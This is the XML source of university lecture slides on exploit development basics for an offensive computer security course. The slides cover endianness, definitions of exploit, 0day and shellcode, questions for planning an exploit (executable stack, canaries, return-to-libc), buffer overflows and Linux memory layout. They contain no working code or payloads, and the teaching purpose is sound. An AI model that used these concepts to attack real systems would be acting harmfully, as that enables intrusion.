          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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94" x="33867"/>
            <a:ext cy="2810236"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4400" i="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>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a:spcBef>
                <a:spcPts val="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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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7pPr>
            <a:lvl8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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Shape 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off y="4047858" x="5734187"/>
            <a:ext cy="2810236"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www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image04.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http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image04.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http://www.nytimes.com/2012/10/30/science/rethinking-the-computer-at-80.html?pagewanted=all&amp;_r=0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External"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http://www.first.org/cvss/faq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://www.first.org/cvss#" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External"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1.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1.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1.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Exploit Development 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CIS 4930 / CIS 5930</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offensive Computer Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spring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Foreword</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 14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Most of the initial techniques taught in this lecture will not work on modern systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>b/c of ASLR, DEP, Stack Cookies, Safe SEH, SEHOP, and etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>It is necessary to teach from the beginning though, to see why these countermeasures came into play</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>We will get into bypassing these countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>*But for now, the term </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>VANILLA SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> means a system without any of these countermeasures active.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>The HAOE book's cd is a nice vanilla system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>great for learning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Foreword continued...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 15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u="sng" b="1" sz="2400" lang="en"/>
              <a:t>NOTE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en"/>
              <a:t>Exploits must be developed with the architecture in mind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>architecture is little endian:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mnemonic tip:   Intel has more characters in common with    "little" than big</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>ie: 0xAABBCC</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> gets stored in memory as: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>	\x</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> \xCC \xBB \xAA  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>(little end first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Most other processors are big-endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>ie: 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en"/>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>BBCCDD gets stored in memory as: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>	\x</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="2400" lang="en"/>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t> \xBB \xCC \xDD  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>(big end first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en" i="1"/>
              <a:t>Some processors now are bi-endian (i.e. ARM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>We will start with the most common vulnerable bug: the buffer overflow bug.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>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Definitions, (Recap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 16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Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(v.) - To take advantage of a vulnerability so that the target system reacts in a manner other than which the designer intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(n.) - The tool, set of instructions, or code that is used to take advantage of a vulnerability.  AKA Proof of Concept (POC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>0day </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(n.) - An exploit for a vulnerability that has not been publicly disclosed.  Sometimes used to refer to the vulnerability itself (i.e. hear about that Java 0day?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>(n.) - a set of instructions injected and then executed by an exploited program</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 Planning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 16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After you've discovered a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>What type of attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>make sense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Stack overflow? Stack randomized??  is the Stack Executable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Canaries?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Other protection mechanisms (more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>How much space do we have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Insert code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Redirect execution?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>return to lib c?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>or other executable regions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>perhaps writable and executable???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Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 17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Quite simple.  Occurs in C/C++ code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Overflows happen when too much stuff in too small a space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>i.e. "Hello World\0" being stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>char buf[6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>"World\0" is written into adjacent memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400" i="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>2 categories of overflows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Heap Overflows (we covered this already :) )</a:t>
            </a:r>
          </a:p>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Linux process memory layout (windows differs!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 17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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
